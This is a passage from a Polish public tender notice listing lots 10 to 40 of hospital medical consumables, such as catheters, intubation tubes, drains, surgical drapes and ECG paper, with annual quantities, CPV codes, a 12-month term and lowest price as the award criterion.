	1 , 2 , 3 , 4 	 szt	200

2	Maski  pediatryczne do tlenu
	 szt	50
3	Maski   do tlenu
	 szt	100
4	Maski do tlenu(tlenoterapia bierna) z drenem i  rezerwuarem o długości 2,1m	. 	. 
	Dla dorosłych	szt	100
	Dla dzieci	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Szczoteczki do pobierania wymazów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  10 :  Szczoteczki  do pobierania wymazów


L.P	 
Nazwa asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
1.	Szczoteczka  cytologiczna  do  pobierania  wymazów sterylna   pakowana pojedyńczo ( typu  miotełka )	szt	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Wzierniki CuSco.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 11: Wzierniki CuSco


L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Wziernik  j x użytku typu CuSco	      X	X
	rozmiar  :   85  x  19 ( S )	szt	100
	rozmiar :  90  x   36  ( M )	szt	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zgłębniki, cewniki,kanki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 12: Zgłębniki ,cewniki, kanki 

L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Zgłębnik dwunastniczy	x	x
	                             14,16,18,20	      szt	
50
2.	Zgłębnik żołądkowy 		
	14,16,18	szt	
300
3.	Cewnik do podawania tlenu przez nos
dł. 1500 mm	szt	800
4.	Kanki do odbytnicze j.u z  miękkiego
PCW :	x	x
	5  x 200 mm	szt	20
	8 x 250 mm	szt	20
	10 x 300 mm	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Cewniki Pezzera,Kehra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 13:Cewniki , Pezzera , Kehra


L.P	 
Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Cewnik Pezzera	x	x
	22,24,26,28,30,32,34,36	szt	20
   2. 	Cewnik Kehra	x	x
	10,12,14,16,18,20,22	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Rurki intubacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 14:Rurki intubacyjne


L.P	 
  Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Rurka  intubacyjna z balonem z niskoobjętościowym i niskociśnieniowym
mankietem 	  x	x
	5,0, 5,5, 6,0, 6,5, 7,0 , 7,5 , 8,0 , 8,5 , 9,0 ,9,5 , 10,0	   szt	200
2.	Rurka intubacyjna pediatryczna bez 
balonem  ORAL/NASAL  	x	x
	2,0 , 2,5 , 3,0 , 3,5 , 4,0 4,5 
	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Rurki trachostomijne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 15 : Rurki tracheostomijne

L.P	 
 Nazwa  asortymentu	J.m.	  Potrzeby    
   roczne   
 (średnio)
 1.	Rurka tracheostomijna z balonem niskociśnieniowym 	   x	x
	5,0 , 6,0 , 7,0 , 7,5 , 8,0 , 9,0 ,9,5 
	szt	50
2	Igła do znieczuleń zewnatrzoponowych  18 G	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Katetery i dreny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 16 : Katetery , dreny 

Lp.	Nazwa  asortymentu	J.m.	Potrzeby       roczne
 ( średnio  )
1.	Kateter  do  embolektomi  i  trombektomi  Fogartego  jednokanałowy   3 F 80 cm	szt	10
2.	Butelka  do długotrwałego 
odsysania ran  BS-250 sterylna	szt	150
3	Zestaw  do kaniulacji  dużych  naczyń 
6F x 20 cm  jednokanałowy	szt	10
4	Zestaw  do kaniulacji  dużych  naczyń 
7F x 20 cm  dwukanałowy	szt	40
5	Kateter  (dren )do odsysania  ran typu  Redon
rozm. 14 F dł. 70 cm
rozm .16 F dł. 70 cm
rozm. 20 F dł. 70 cm	

szt
	

100
6
	Dren  brzuszny  z  dwoma otworami  
bocznymi   
22 F/40 , 24F/ 40 , 26 F/40 , 28 F/40
30 F/40 , 32 F/40 , 34 F/40 , 36 F/40	

szt	

80
7	Igły  do  znieczuleń  podpajęczynówkowych  przezroczysta	X	x
	19 G, 22G	szt	150
8.	Igły do znieczuleń  podpajęczynówkowych  standard  z  igłą 
prowadzącą	x	x
	 25 G,26G,27G	szt	
200
9	Igła do znieczuleń podpajęczynówkowych 
typ Pencil-Point  z igłą  prowadzącą
25 G , 26 G , 27 G 	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Filtry przeciwbakteryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 17 : Filtry antybakteryjne 


L.p.	Nazwa  asortymentu	J.m.	   Potrzeby     
   roczne
  ( średnio)
1.	Filtry  oddechowe  antybaktyryjne  I 
antywirusowe ,czyste mikrobiologicznie o niskiej wadze własnej   (do 30 g ) oraz małych gabarytach elektrostatyczne z wymiennikiem  ciepła  i  wilgoci z   portem dla dorosłych, skuteczność filtrowania musi wynosić >99,99% a okres użytkowania nie może być krótszy niż 24 godz.,przestrzeń martwa   nie może przekroczyć  85 ml do  aparatu  do  znieczulenia	


szt	


250
2.	Filtry  antybakteryjne,antywirusowe,elektrostatyczne ,bez wymiennika ciepła  i  wilgoci , z portem kapno, pakowane pojedyńczo, sterylne do aparatu  AMBU	
szt	
300
3.	Filtry  do ssaków
	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Kanki Yankauera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 18: Kanki Yankauera 


L.P	 
Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Dren  łączący 3 m jałowy z końcówką odsysającą do pola operacyjnego typu
Kanki Yankauera   22 Ch	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Dreny,zestawy do drenażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  19 : Dreny , zestawy do drenażu
     
L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Dren  standardowy  z   troakarem  tępym	x	x
	20 F  , 24 F  , 28 F , 32 F	szt	30
  2.	Zestaw do drenażu jamy  opłucnej typu
Redax lub równoważny	szt	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Przewód do cystoskopu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 20  : Przewód do cystoskopu 
L.P	 
 Nazwa  asortyment	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Przewód do cystoskopu lub rektoskopu 
podwójny jałowy niepinogenny, nietoksyczny	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Powłoka ochronna do kabla.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 21 : Powłoka ochronna do kabla
L.P	 
   Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Powłoka ochronna do kabla kamerowego 
13 cm x 250 cm jałowa	szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Dreny łączące jałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  22: Dreny łączące jałowe 
L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Dren   łączący   jałowy  końcówka 
1 żeńska , 1 żeńska dł. 3000 mm	szt	100
  2.	Dren  łączący  jałowy o przekroju 6 mm
dł. 2 m , mały  łacznik żeński , 1 łącznik do cewnika 	szt	500
  3.	Dren  tlenowy jałowy rozm. 7 FT 
dł. 2-3 m	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zestaw punkcji opłucnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet  23 Zestaw do punkcji opłucnej  
L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Zestaw jednorazowy do punkcji opłucnej  (typu  Pleurofix )	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Filtr do rurek tracheostomijnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet  24  Filtr do rurek tracheostomijnych  

L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Wymiennik ciepła  i  wilgoci  (filtr ) do
rurek  tracheostomijnych  z  portem
tlenowym  i  zamykanym   portem  
do odsysania sterylne 	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zgłębniki i zestawy do żywienia dojelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 25  Zgłębnik  do żywienia dożołądkowego 

L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
1	Zestaw do żywienia do jelitowego służący do połączenia worka z dietą (opakowanie miekkie typu PACK) ze zgłębnikiem. Umożliwia żywienie pacjenta metodą ciągłego wlewu za pomocą pompy FLOCARE INFINITY wersja do zastosowań stacjonarnych	szt	30
2	Zestaw do żywienia dojelitowego służący do połączenia worka z dietą (opakowanie miekkie typu PACK) ze zgłębnikiem. Umożliwia żywienie pacjenta metodą ciągłego wlewu kroplowego(wersja grawitacyjna)	szt	30
3	Zgłębnik  do żywienia  dożołądkowego
z  poliuretanu  czas stosowania do 6 tyg.
Z  prowadnicą, podziałką centymetrową 
z linią kontrastującą  w  promieniach
rtg . Końcówka  cewnika  z  bocznymi 
otworami  I  jednym głównym otworem kończącym  zgłębnik. Łącznik poliuretanowy  umożliwiający połączenie z zestawem do żywienia 
dojelitowego  dł. 110 cm	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zestaw uniwersalny na stolik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 26 :  Zestawy uniwersalny na stolik
L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
1	Zestaw składa się:
1 serweta na stolik narzędziowy 140x190
1 serweta na stoliok Mayo 80x145
2 samoprzylepne serwety operacyjne 75x90
1 samoprzylepna serweta operacyjna 170x 175
1 samoprzylepna serweta operacyjna 150x240
1 taśma samoprzylepna 10x50
2 ręczniki celulozowe 33x33	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Serweta z wycięciem U.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 27:Serweta z wycięciem U
L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
1	Serweta z  wycięciem U 230x260cm, łata chłonna wycięcie 200x100cm	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Fartuch chirurgiczny uniwersalny do mokrych operacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 28: Fartuch chirurgiczny uniwersalny do mokrych operacji

L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
1	Fartuch chirurgiczny uniwersalny do mokrych operacji	. 	. 
	Rozmiar L                szt            50
                             M	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Maska chirurgiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 29: Maska chirurgiczna

L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
1	Maska chirurgiczna typ anti splash odporna na przesiąkanie, czterowarstwowa wiązana na troki	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Zestaw do cystostomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 30  Zestaw do cystostomii-cystostom
L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
1	Zestaw składa się:
kateter typ Pigtai
igła rozrywalna
kołnierz mocujący
skalpel
strzykawka 10ml
opaska zaciskowa	. 	. 
	Rozmiar 12F,           szt           2
                              14F	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Igły do wstrzyknięć.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 31: :  Igły do wstrzyknięć i  szczoteczki do endoskopów 
L.P	 
 Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
1	Igły do wstrzyknięć średnica 2,4 mm,długość 2300mm,rozmiar igły 25G długość igły 8mm	szt	       200
2	Szczoteczka do czyszczenia akcesoriów i otworów na przyciski w endoskopie średnica 10mm
	szt	800
3	Szczoteczki jednorazowe do czyszczenia endoskopów
dwustronna, średnica 5mm i 10mm, długość 230 cm	szt	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Wkłady jednorazowe do systemu ssącego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  32 : Wkłady jednorazowe do systemu ssącego
        L.P	 
  Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
   1.	Wkłady  workowe jednorazowego użytku  do systemu  ssącego preżelowe  - z trwale dołączoną pokrywą, kompatybilny z pojemnikiem posiadający funkcję  samozasysania i uszczelniany  automatycznie po uruchomieniu  ssania bez konieczności wciskania go w kanister. Wyposażony w  filtr  antybakteryjny  i membranę hydrofobowy  zabezpieczający żródło ssania przed  zalaniem - automatyczne odcięcie ssania po napełnieniu się wkładu. Posiadajace szeroką pętle do łatwego demontażu worka, wykonane z cienkiej folii poj. 1000 ml , 2000 ml, 3000 ml	szt	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Papiery termoczułe,KTG,EKG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 33 :  Papiery : termoczułe , KTG, EKG

  L.P.	  Nazwa   asortymentu	 J.M.	Potrzeby  roczne
  (średnie)
1.	Papier  do EKG termoczuły :	. 	. 
. 	 104  x  40	szt	20
. 	 112  x 25	szt	400
2.	Papier do  EKG ASCARD Mr.RED termoczuły bezpyłowy szerokość 60mm	szt	30
3.	Papier  do  videoprintera
K61B  rozmiar 110 x 21	szt	50
4	Papiery  do drukarek  termicznych :	. 	. 
. 	110 x  24
	szt	20
. 	  57  x  30  
	szt	200
5	Papier do  EKG wysiłkowego
SICARD 460  148 x 100 x 400	szt	10
6	Papier  do  KTG  Oxford  TEAM
143 x 150 x 300	szt	5
7	Papier  do defibrylatora   ZOLL  M-SERIES
Basic-2      90 x 90 x 200 	szt	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Papier do defibrylatora LIFEPACK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 34 :  Papier do LIFEPACK

  L.P.	  Nazwa   asortymentu	 J.M.	Potrzeby  roczne
  (średnie)
   1.	Papier  do defibrylatora   LIFEPACK  12,15
szerokość   siatki milimetrowej 100mm ,  szerokość papieru 102mm,  pakowany po 2 rolki	    Szt 	         15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Elektrody i żele.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet  35 Elektrody , żele 

  L.P.	 Nazwa  asortymentu	 J.M.	Potrzeby  roczne (średnie)

1	Żel  do EKG  0,25 l
	szt	10
2	Żel  do USG  0,5 l
	szt	100
3	Elektroda do EKG ? 55 mm
	szt	14 000
4	Elektroda do EKG ? 30 mm
	szt	100
5	Elektroda  typ  LLL  510	szt	10 000
6	Przewód PD 3	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Opaski i pojemniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 36  Opaski , pojemniki .

L.P	 
Nazwa  asortymentu	   J.m.	  Potrzeby    
   roczne   
 (średnio)
1.	Dreny do ssaków   Ć   9 mm	 szt	10
2	Opaska  identyfikacyjna dla  dorosłych	 szt	1200
3	Opaska  identyfikacyjna dla  dzieci  	 szt	1000
4	Pojemnik  na  plwocinę	 szt	100
5	Pojemniki bakteriologiczne	 szt	200
6	Pojemniki na wenflony 0,7 l 	 szt	1000
7	Pojemnik na zużyte igły 2 l  	szt	1000
8	Pojemnik na zużyte igły 0,2 l płaskie 	szt	500
9	Pojemnik na zużyte igły 0,7 l płaskie  	szt	500
10	Łopatka  drewniana  a 100	 op	50
11	Uchwyt plastikowy na worki do moczu	szt	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Bielizna jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 37 Bielizna jednorazowego użytku
L.P.	
 Nazwa  asortymentu	
J.M.	Potrzeby roczne
    (średnio)
   1.	Czepek fizelinowy okrągły	  szt	3000
   2.	Fartuch  fizelinowy	  szt	2000
   3.	Prześcieradło fizelinowe 200 x 160	  szt	4500
   4.	Poszwa na  koc fizelinowa	  szt	500
   5.	Poszewka  na  poduszkę  fizelinowa	  szt	500
   6.	Fartuch  foliowy	  szt	7000
   7.	Rękawiczki foliowe	  szt	17000
   8.	Myjki  jednorazowego użytku	  szt	24000
   9.	Maski ochronne  nie wyjałowione	  szt	3000
 10.	Ochraniacze na buty foliowe	  szt	2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Błony RTG,wywoływacz,utrwalacz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  38 : Błony rtg , wywoływacz , utrwalacz

L.p.	Nazwa asortymentu	
J. m.	 Potrzeby          
  roczne
 (średnio)
1.	Błony  RTG ogólnodiagnostyczne, zielonoczułe ( do  obróbki  mechanicznej ) 	. 	. 
	18 x 24	szt	1500
	24 x 30	szt	3000
	30 x 40	szt	600
	35 x 35	szt	2500
	35 x 43	szt	3000
2.	Utrwalacz   RTG   1 x 25 l	op	50
3.	Wywoływacz  RTG   1 x 20 l	op	25
     Błony i odczynniki muszą pochodzić od jednego producenta i być tej samej marki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Koperty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 39 . Koperty
L.P.	Nazwa asortymentu	J.m.	Potrzeby  roczne
    ( średnie )
  1.	   KOPERTY             
    a100 szt.	. 	. 
. 	     35  x  43	op	30
. 	     35  x  35	op	20
. 	     24  x  30	op	20
. 	     18  x  24	op	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Baseny sanitarne i miski nerkowate.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 40 : Baseny sanitarne , miski nerkowate
L.P.	   Nazwa asortymentu	J.m.	Potrzeby   roczne
( średnie )
1	Pojniki dla  chorych	  szt	50
2	Kaczka 	szt	50
3	Basen sanitarny	  szt	50
4	Kieliszki  do leków  plastikowe	  szt	10 000
5	Miski  nerkowate  plastikowe małe  	  szt	20
6	Miski  nerkowate  plastikowe duże	  szt	20.</p></li>
